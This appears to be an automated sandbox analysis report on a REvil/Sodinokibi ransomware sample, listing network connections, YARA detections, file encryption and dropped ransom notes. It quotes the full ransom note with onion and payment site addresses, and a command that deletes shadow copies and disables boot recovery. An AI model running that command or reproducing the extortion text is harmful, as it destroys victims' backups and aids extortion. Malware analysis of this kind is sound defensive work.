Source: unknown	HTTPS traffic detected: 85.10.140.71:443 -> 192.168.2.4:49763 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.246.227.29:443 -> 192.168.2.4:49764 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.68.16.21:443 -> 192.168.2.4:49765 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49766 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 141.95.251.157:443 -> 192.168.2.4:49767 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.214.166.193:443 -> 192.168.2.4:49769 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.214.166.193:443 -> 192.168.2.4:49770 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 109.237.132.56:443 -> 192.168.2.4:49771 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 80.158.2.41:443 -> 192.168.2.4:49772 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.214.211.239:443 -> 192.168.2.4:49773 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.15.78.186:443 -> 192.168.2.4:49774 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.15.78.186:443 -> 192.168.2.4:49775 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 198.185.159.145:443 -> 192.168.2.4:49776 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 198.185.159.144:443 -> 192.168.2.4:49777 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 95.215.226.251:443 -> 192.168.2.4:49778 version: TLS 1.2

Spam, unwanted Advertisements and Ransom Demands

Found ransom note / readme

Source: C:\Users\user\Pictures\Camera Roll\g165067x37-readme.txt

Dropped file: ---=== Welcome. Again. ===---[+] Whats Happen? [+]Your files are encrypted, and currently unavailable. You can check it: all files on you computer has expansion g165067x37.By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER).[+] What guarantees? [+]Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests.To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee.If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money.[+] How to get access on website? [+]You have two ways:1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/1A63B2FBDC0100612) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.top/1A63B2FBDC010061Warning: secondary website can be blocked, thats why first variant m

Jump to dropped file

Yara detected Chaos Ransomware

Source: Yara match

File source: Process Memory Space: myfile.exe PID: 7156, type: MEMORYSTR

Yara detected Netwalker ransomware

Source: Yara match

File source: Process Memory Space: myfile.exe PID: 7156, type: MEMORYSTR

Yara detected Python Ransomware

Source: Yara match

File source: Process Memory Space: myfile.exe PID: 7156, type: MEMORYSTR

Yara detected RansomwareGeneric

Source: Yara match

File source: Process Memory Space: myfile.exe PID: 7156, type: MEMORYSTR

Yara detected Revil

Source: Yara match	File source: myfile.exe, type: SAMPLE
Source: Yara match	File source: 0.0.myfile.exe.270000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.myfile.exe.270000.0.unpack, type: UNPACKEDPE

Yara detected Sodinokibi Ransomware

Source: Yara match

File source: Process Memory Space: myfile.exe PID: 7156, type: MEMORYSTR

Yara detected TrojanRansom

Source: Yara match

File source: Process Memory Space: myfile.exe PID: 7156, type: MEMORYSTR

Contains functionalty to change the wallpaper

Source: C:\Users\user\Desktop\myfile.exe

Code function: 0_2_002739B0 GetDC,CreateCompatibleDC,GetDeviceCaps,GetDeviceCaps,CreateCompatibleBitmap,SelectObject,GetDeviceCaps,MulDiv,CreateFontW,SelectObject,SetBkMode,SetTextColor,GetStockObject,FillRect,SetPixel,DrawTextW,SystemParametersInfoW,DeleteObject,DeleteObject,DeleteDC,ReleaseDC,

0_2_002739B0

Deletes shadow drive data (may be related to ransomware)

Source: myfile.exe, 00000000.00000003.2329277813.0000000002A51000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: C:\Users\user\Desktop\C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /All /Quiet & bcdedit /set {default} recoveryenabled No & bcdedit /set {default} bootstatuspolicy ignoreallfailuresAEAC:\Windows\System32\cmd.

Found potential ransomware demand text

Source: myfile.exe, 00000000.00000003.1934915360.0000000002C37000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory : All of your files are encrypted!
Source: myfile.exe, 00000000.00000003.2589188241.0000000002C37000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory : All of your files are encrypted!
Source: myfile.exe, 00000000.00000003.2155301553.0000000002C37000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory : All of your files are encrypted!
Source: myfile.exe, 00000000.00000003.1942076208.0000000002C37000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory : All of your files are encrypted!
Source: myfile.exe, 00000000.00000003.1980534561.0000000002C37000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory : All of your files are encrypted!
Source: myfile.exe, 00000000.00000003.2008810311.0000000002C37000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory : All of your files are encrypted!
Source: myfile.exe, 00000000.00000003.2027755663.0000000002C37000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory : All of your files are encrypted!
Source: myfile.exe, 00000000.00000002.2894500583.0000000002C37000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory : All of your files are encrypted!

Modifies existing user documents (likely ransomware behavior)

Source: C:\Users\user\Desktop\myfile.exe	File moved: C:\Users\user\Desktop\DTBZGIOOSO\KATAXZVCPS.mp3	Jump to behavior
Source: C:\Users\user\Desktop\myfile.exe	File deleted: C:\Users\user\Desktop\DTBZGIOOSO\KATAXZVCPS.mp3	Jump to behavior
Source: C:\Users\user\Desktop\myfile.exe	File moved: C:\Users\user\Desktop\DVWHKMNFNN.jpg	Jump to behavior
Source: C:\Users\user\Desktop\myfile.exe	File deleted: C:\Users\user\Desktop\DVWHKMNFNN.jpg	Jump to behavior
Source: C:\Users\user\Desktop\myfile.exe	File moved: C:\Users\user\Desktop\NWTVCDUMOB.png	Jump to behavior

Writes a notice file (html or txt) to demand a ransom

Source: C:\Users\user\Desktop\myfile.exe	File dropped: C:\Users\user\Pictures\Camera Roll\g165067x37-readme.txt -> decrypt one file for free. that is our guarantee.if you will not cooperate with our service - for us, its does not matter. but you will lose your time and data, cause just we have the private key. in practise - time is much more valuable than money.[+] how to get access on website? [+]you have two ways:1) [recommended] using a tor browser! a) download and install tor browser from this site: https://torproject.org/ b) open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/1a63b2fbdc0100612) if tor blocked in your country, try to use vpn! but you can use our secondary website. for this: a) open your any browser (chrome, firefox, opera, ie, edge) b) open our secondary website: http://decryptor.top/1a63b2fbdc010061warning: secondary website can be blocked, thats why first variant much better and more available.when you open our website, put the following data in the input form:key:vkofiliva4lyiaeeyh2h9vssv8as3lezrslkwaojtcwegvpk9g6k6yvmj	Jump to dropped file
Source: C:\Users\user\Desktop\myfile.exe	File dropped: C:\Users\user\Documents\NIKHQAIQAU\g165067x37-readme.txt -> decrypt one file for free. that is our guarantee.if you will not cooperate with our service - for us, its does not matter. but you will lose your time and data, cause just we have the private key. in practise - time is much more valuable than money.[+] how to get access on website? [+]you have two ways:1) [recommended] using a tor browser! a) download and install tor browser from this site: https://torproject.org/ b) open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/1a63b2fbdc0100612) if tor blocked in your country, try to use vpn! but you can use our secondary website. for this: a) open your any browser (chrome, firefox, opera, ie, edge) b) open our secondary website: http://decryptor.top/1a63b2fbdc010061warning: secondary website can be blocked, thats why first variant much better and more available.when you open our website, put the following data in the input form:key:vkofiliva4lyiaeeyh2h9vssv8as3lezrslkwaojtcwegvpk9g6k6yvmj	Jump to dropped file
Source: C:\Users\user\Desktop\myfile.exe	File dropped: C:\Users\user\Pictures\Saved Pictures\g165067x37-readme.txt -> decrypt one file for free. that is our guarantee.if you will not cooperate with our service - for us, its does not matter. but you will lose your time and data, cause just we have the private key. in practise - time is much more valuable than money.[+] how to get access on website? [+]you have two ways:1) [recommended] using a tor browser! a) download and install tor browser from this site: https://torproject.org/ b) open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/1a63b2fbdc0100612) if tor blocked in your country, try to use vpn! but you can use our secondary website. for this: a) open your any browser (chrome, firefox, opera, ie, edge) b) open our secondary website: http://decryptor.top/1a63b2fbdc010061warning: secondary website can be blocked, thats why first variant much better and more available.when you open our website, put the following data in the input form:key:vkofiliva4lyiaeeyh2h9vssv8as3lezrslkwaojtcwegvpk9g6k6yvmj	Jump to dropped file
Source: C:\Users\user\Desktop\myfile.exe	File dropped: C:\Users\user\Documents\ONBQCLYSPU\g165067x37-readme.txt -> decrypt one file for free. that is our guarantee.if you will not cooperate with our service - for us, its does not matter. but you will lose your time and data, cause just we have the private key. in practise - time is much more valuable than money.[+] how to get access on website? [+]you have two ways:1) [recommended] using a tor browser! a) download and install tor browser from this site: https://torproject.org/ b) open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/1a63b2fbdc0100612) if tor blocked in your country, try to use vpn! but you can use our secondary website. for this: a) open your any browser (chrome, firefox, opera, ie, edge) b) open our secondary website: http://decryptor.top/1a63b2fbdc010061warning: secondary website can be blocked, thats why first variant much better and more available.when you open our website, put the following data in the input form:key:vkofiliva4lyiaeeyh2h9vssv8as3lezrslkwaojtcwegvpk9g6k6yvmj	Jump to dropped file
Source: C:\Users\user\Desktop\myfile.exe	File dropped: C:\Users\user\Documents\SQRKHNBNYN\g165067x37-readme.txt -> decrypt one file for free. that is our guarantee.if you will not cooperate with our service - for us, its does not matter. but you will lose your time and data, cause just we have the private key. in practise - time is much more valuable than money.[+] how to get access on website? [+]you have two ways:1) [recommended] using a tor browser! a) download and install tor browser from this site: https://torproject.org/ b) open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/1a63b2fbdc0100612) if tor blocked in your country, try to use vpn! but you can use our secondary website. for this: a) open your any browser (chrome, firefox, opera, ie, edge) b) open our secondary website: http://decryptor.top/1a63b2fbdc010061warning: secondary website can be blocked, thats why first variant much better and more available.when you open our website, put the following data in the input form:key:vkofiliva4lyiaeeyh2h9vssv8as3lezrslkwaojtcwegvpk9g6k6yvmj	Jump to dropped file
Source: C:\Users\user\Desktop\myfile.exe	File dropped: C:\Users\g165067x37-readme.txt -> decrypt one file for free. that is our guarantee.if you will not cooperate with our service - for us, its does not matter. but you will lose your time and data, cause just we have the private key. in practise - time is much more valuable than money.[+] how to get access on website? [+]you have two ways:1) [recommended] using a tor browser! a) download and install tor browser from this site: https://torproject.org/ b) open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/1a63b2fbdc0100612) if tor blocked in your country, try to use vpn! but you can use our secondary website. for this: a) open your any browser (chrome, firefox, opera, ie, edge) b) open our secondary website: http://decryptor.top/1a63b2fbdc010061warning: secondary website can be blocked, thats why first variant much better and more available.when you open our website, put the following data in the input form:key:vkofiliva4lyiaeeyh2h9vssv8as3lezrslkwaojtcwegvpk9g6k6yvmj	Jump to dropped file
Source: C:\Users\user\Desktop\myfile.exe	File dropped: C:\$WinREAgent\Scratch\g165067x37-readme.txt -> decrypt one file for free. that is our guarantee.if you will not cooperate with our service - for us, its does not matter. but you will lose your time and data, cause just we have the private key. in practise - time is much more valuable than money.[+] how to get access on website? [+]you have two ways:1) [recommended] using a tor browser! a) download and install tor browser from this site: https://torproject.org/ b) open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/1a63b2fbdc0100612) if tor blocked in your country, try to use vpn! but you can use our secondary website. for this: a) open your any browser (chrome, firefox, opera, ie, edge) b) open our secondary website: http://decryptor.top/1a63b2fbdc010061warning: secondary website can be blocked, thats why first variant much better and more available.when you open our website, put the following data in the input form:key:vkofiliva4lyiaeeyh2h9vssv8as3lezrslkwaojtcwegvpk9g6k6yvmj	Jump to dropped file
Source: C:\Users\user\Desktop\myfile.exe	File dropped: C:\Users\user\Documents\WKXEWIOTXI\g165067x37-readme.txt -> decrypt one file for free. that is our guarantee.if you will not cooperate with our service - for us, its does not matter. but you will lose your time and data, cause just we have the private key. in practise - time is much more valuable than money.[+] how to get access on website? [+]you have two ways:1) [recommended] using a tor browser! a) download and install tor browser from this site: https://torproject.org/ b) open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/1a63b2fbdc0100612) if tor blocked in your country, try to use vpn! but you can use our secondary website. for this: a) open your any browser (chrome, firefox, opera, ie, edge) b) open our secondary website: http://decryptor.top/1a63b2fbdc010061warning: secondary website can be blocked, thats why first variant much better and more available.when you open our website, put the following data in the input form:key:vkofiliva4lyiaeeyh2h9vssv8as3lezrslkwaojtcwegvpk9g6k6yvmj	Jump to dropped file
Source: C:\Users\user\Desktop\myfile.exe	File dropped: C:\Users\Default\g165067x37-readme.txt -> decrypt one file for free. that is our guarantee.if you will not cooperate with our service - for us, its does not matter. but you will lose your time and data, cause just we have the private key. in practise - time is much more valuable than money.[+] how to get access on website? [+]you have two ways:1) [recommended] using a tor browser! a) download and install tor browser from this site: https://torproject.org/ b) open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/1a63b2fbdc0100612) if tor blocked in your country, try to use vpn! but you can use our secondary website. for this: a) open your any browser (chrome, firefox, opera, ie, edge) b) open our secondary website: http://decryptor.top/1a63b2fbdc010061warning: secondary website can be blocked, thats why first variant much better and more available.when you open our website, put the following data in the input form:key:vkofiliva4lyiaeeyh2h9vssv8as3lezrslkwaojtcwegvpk9g6k6yvmj	Jump to dropped file
Source: C:\Users\user\Desktop\myfile.exe	File dropped: C:\Users\user\g165067x37-readme.txt -> decrypt one file for free. that is our guarantee.if you will not cooperate with our service - for us, its does not matter. but you will lose your time and data, cause just we have the private key. in practise - time is much more valuable than money.[+] how to get access on website? [+]you have two ways:1) [recommended] using a tor browser! a) download and install tor browser from this site: https://torproject.org/ b) open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/1a63b2fbdc0100612) if tor blocked in your country, try to use vpn! but you can use our secondary website. for this: a) open your any browser (chrome, firefox, opera, ie, edge) b) open our secondary website: http://decryptor.top/1a63b2fbdc010061warning: secondary website can be blocked, thats why first variant much better and more available.when you open our website, put the following data in the input form:key:vkofiliva4lyiaeeyh2h9vssv8as3lezrslkwaojtcwegvpk9g6k6yvmj	Jump to dropped file

System Summary

Malicious sample detected (through community Yara rule)

Source: myfile.exe, type: SAMPLE	Matched rule: Identifies SODINOKIBI/REvil ransomware Author: unknown
Source: myfile.exe, type: SAMPLE	Matched rule: Identifies SODINOKIBI/REvil ransomware Author: unknown
Source: myfile.exe, type: SAMPLE	Matched rule: REvil Payload Author: R3MRUM
Source: myfile.exe, type: SAMPLE	Matched rule: Win32_Ransomware_Revil Author: ReversingLabs
Source: 0.0.myfile.exe.270000.0.unpack, type: UNPACKEDPE	Matched rule: Identifies SODINOKIBI/REvil ransomware Author: unknown
Source: 0.0.myfile.exe.270000.0.unpack, type: UNPACKEDPE	Matched rule: Identifies SODINOKIBI/REvil ransomware Author: unknown
Source: 0.0.myfile.exe.270000.0.unpack, type: UNPACKEDPE	Matched rule: REvil Payload Author: R3MRUM
Source: 0.0.myfile.exe.270000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_Revil Author: ReversingLabs
Source: 0.2.myfile.exe.270000.0.unpack, type: UNPACKEDPE	Matched rule: Identifies SODINOKIBI/REvil ransomware Author: unknown
Source: 0.2.myfile.exe.270000.0.unpack, type: UNPACKEDPE	Matched rule: Identifies SODINOKIBI/REvil ransomware Author: unknown
Source: 0.2.myfile.exe.270000.0.unpack, type: UNPACKEDPE	Matched rule: REvil Payload Author: R3MRUM
Source: 0.2.myfile.exe.270000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_Revil Author: ReversingLabs
Source: 00000000.00000002.2893815906.0000000000271000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: Identifies SODINOKIBI/REvil ransomware Author: unknown
Source: 00000000.00000000.1647049931.0000000000271000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: Identifies SODINOKIBI/REvil ransomware Author: unknown

Source: C:\Users\user\Desktop\myfile.exe

File deleted: C:\Windows\WinSxS\Backup\amd64_hid-user.resources_31bf3856ad364e35_10.0.19041.1_en-gb_140ae2618f6740b3.manifest

Jump to behavior

Source: C:\Users\user\Desktop\myfile.exe	Code function: 0_2_0027A4BE	0_2_0027A4BE
Source: C:\Users\user\Desktop\myfile.exe	Code function: 0_2_00279829	0_2_00279829
Source: C:\Users\user\Desktop\myfile.exe	Code function: 0_2_00277814	0_2_00277814
Source: C:\Users\user\Desktop\myfile.exe	Code function: 0_2_00277093	0_2_00277093
Source: C:\Users\user\Desktop\myfile.exe	Code function: 0_2_002772F1	0_2_002772F1

Source: myfile.exe

Static PE information: No import functions for PE file found

Source: myfile.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: myfile.exe, type: SAMPLE	Matched rule: Windows_Ransomware_Sodinokibi_83f05fbe os = windows, severity = x86, description = Identifies SODINOKIBI/REvil ransomware, creation_date = 2020-06-18, scan_context = file, memory, reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.revil, license = Elastic License v2, threat_name = Windows.Ransomware.Sodinokibi, fingerprint = 8c32ca099c9117e394379c0cc4771a15e5e4cfb1a98210c288e743a6d9cc9967, id = 83f05fbe-65d1-423f-98df-21692167a1d6, last_modified = 2021-08-23
Source: myfile.exe, type: SAMPLE	Matched rule: Windows_Ransomware_Sodinokibi_a282ba44 os = windows, severity = x86, description = Identifies SODINOKIBI/REvil ransomware, creation_date = 2020-06-18, scan_context = file, memory, reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.revil, license = Elastic License v2, threat_name = Windows.Ransomware.Sodinokibi, fingerprint = 07f1feb22f8b9de0ebd5c4649545eb4823a274b49b2c61a44d3eed4739ecd572, id = a282ba44-b8bf-4fcc-a1c4-795675a928de, last_modified = 2021-08-23
Source: myfile.exe, type: SAMPLE	Matched rule: REvil author = R3MRUM, description = REvil Payload, cape_type = REvil Payload
Source: myfile.exe, type: SAMPLE	Matched rule: Win32_Ransomware_Revil tc_detection_name = Revil, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 0.0.myfile.exe.270000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Sodinokibi_83f05fbe os = windows, severity = x86, description = Identifies SODINOKIBI/REvil ransomware, creation_date = 2020-06-18, scan_context = file, memory, reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.revil, license = Elastic License v2, threat_name = Windows.Ransomware.Sodinokibi, fingerprint = 8c32ca099c9117e394379c0cc4771a15e5e4cfb1a98210c288e743a6d9cc9967, id = 83f05fbe-65d1-423f-98df-21692167a1d6, last_modified = 2021-08-23
Source: 0.0.myfile.exe.270000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Sodinokibi_a282ba44 os = windows, severity = x86, description = Identifies SODINOKIBI/REvil ransomware, creation_date = 2020-06-18, scan_context = file, memory, reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.revil, license = Elastic License v2, threat_name = Windows.Ransomware.Sodinokibi, fingerprint = 07f1feb22f8b9de0ebd5c4649545eb4823a274b49b2c61a44d3eed4739ecd572, id = a282ba44-b8bf-4fcc-a1c4-795675a928de, last_modified = 2021-08-23
Source: 0.0.myfile.exe.270000.0.unpack, type: UNPACKEDPE	Matched rule: REvil author = R3MRUM, description = REvil Payload, cape_type = REvil Payload
Source: 0.0.myfile.exe.270000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_Revil tc_detection_name = Revil, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 0.2.myfile.exe.270000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Sodinokibi_83f05fbe os = windows, severity = x86, description = Identifies SODINOKIBI/REvil ransomware, creation_date = 2020-06-18, scan_context = file, memory, reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.revil, license = Elastic License v2, threat_name = Windows.Ransomware.Sodinokibi, fingerprint = 8c32ca099c9117e394379c0cc4771a15e5e4cfb1a98210c288e743a6d9cc9967, id = 83f05fbe-65d1-423f-98df-21692167a1d6, last_modified = 2021-08-23
Source: 0.2.myfile.exe.270000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Sodinokibi_a282ba44 os = windows, severity = x86, description = Identifies SODINOKIBI/REvil ransomware, creation_date = 2020-06-18, scan_context = file, memory, reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.revil, license = Elastic License v2, threat_name = Windows.Ransomware.Sodinokibi, fingerprint = 07f1feb22f8b9de0ebd5c4649545eb4823a274b49b2c61a44d3eed4739ecd572, id = a282ba44-b8bf-4fcc-a1c4-795675a928de, last_modified = 2021-08-23
Source: 0.2.myfile.exe.270000.0.unpack, type: UNPACKEDPE	Matched rule: REvil author = R3MRUM, description = REvil Payload, cape_type = REvil Payload
Source: 0.2.myfile.exe.270000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_Revil tc_detection_name = Revil, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 00000000.00000002.2893815906.0000000000271000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Sodinokibi_a282ba44 os = windows, severity = x86, description = Identifies SODINOKIBI/REvil ransomware, creation_date = 2020-06-18, scan_context = file, memory, reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.revil, license = Elastic License v2, threat_name = Windows.Ransomware.Sodinokibi, fingerprint = 07f1feb22f8b9de0ebd5c4649545eb4823a274b49b2c61a44d3eed4739ecd572, id = a282ba44-b8bf-4fcc-a1c4-795675a928de, last_modified = 2021-08-23
Source: 00000000.00000000.1647049931.0000000000271000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Sodinokibi_a282ba44 os = windows, severity = x86, description = Identifies SODINOKIBI/REvil ransomware, creation_date = 2020-06-18, scan_context = file, memory, reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.revil, license = Elastic License v2, threat_name = Windows.Ransomware.Sodinokibi, fingerprint = 07f1feb22f8b9de0ebd5c4649545eb4823a274b49b2c61a44d3eed4739ecd572, id = a282ba44-b8bf-4fcc-a1c4-795675a928de, last_modified = 2021-08-23

Source: classification engine

Classification label: mal100.rans.troj.evad.winEXE@4/287@54/36

Source: C:\Users\user\Desktop\myfile.exe

Code function: 0_2_00273F3C GetDriveTypeW,GetDiskFreeSpaceExW,

0_2_00273F3C

Source: C:\Users\user\Desktop\myfile.exe

Code function: 0_2_00274668 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,

0_2_00274668

Source: C:\Users\user\Desktop\myfile.exe

File created: c:\program files\g165067x37-readme.txt

Jump to behavior

Source: C:\Users\user\Desktop\myfile.exe

File created: c:\users\g165067x37-readme.txt

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6368:120:WilError_03
Source: C:\Users\user\Desktop\myfile.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\206D87E0-0E60-DF25-DD8F-8E4E7D1E3BF0

Source: C:\Users\user\Desktop\myfile.exe

File created: C:\Users\user\AppData\Local\Temp\p2fi4k6gh0.bmp

Jump to behavior

Source: myfile.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\myfile.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\myfile.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: myfile.exe	Virustotal: Detection: 90%
Source: myfile.exe	ReversingLabs: Detection: 97%

Source: unknown	Process created: C:\Users\user\Desktop\myfile.exe "C:\Users\user\Desktop\myfile.exe"
Source: C:\Users\user\Desktop\myfile.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /All /Quiet & bcdedit /set {default} recoveryenabled No & bcdedit /set {default} bootstatuspolicy ignoreallfailures
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\myfile.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /All /Quiet & bcdedit /set {default} recoveryenabled No & bcdedit /set {default} bootstatuspolicy ignoreallfailures	Jump to behavior

Source: C:\Users\user\Desktop\myfile.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\myfile.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\myfile.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\myfile.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\myfile.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\myfile.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\myfile.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\myfile.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\myfile.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\myfile.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\myfile.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\myfile.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\myfile.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\myfile.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\myfile.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\myfile.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\myfile.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\myfile.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\myfile.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\myfile.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\myfile.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\myfile.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\myfile.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\myfile.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\myfile.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\myfile.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Users\user\Desktop\myfile.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Users\user\Desktop\myfile.exe	Section loaded: drprov.dll	Jump to behavior
Source: C:\Users\user\Desktop\myfile.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Users\user\Desktop\myfile.exe	Section loaded: ntlanman.dll	Jump to behavior
Source: C:\Users\user\Desktop\myfile.exe	Section loaded: davclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\myfile.exe	Section loaded: davhlpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\myfile.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Users\user\Desktop\myfile.exe	Section loaded: cscapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\myfile.exe	Section loaded: browcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\myfile.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\myfile.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\myfile.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\Desktop\myfile.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\myfile.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\myfile.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\myfile.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\myfile.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\myfile.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\myfile.exe	Section loaded: schannel.dll	Jump to behavior
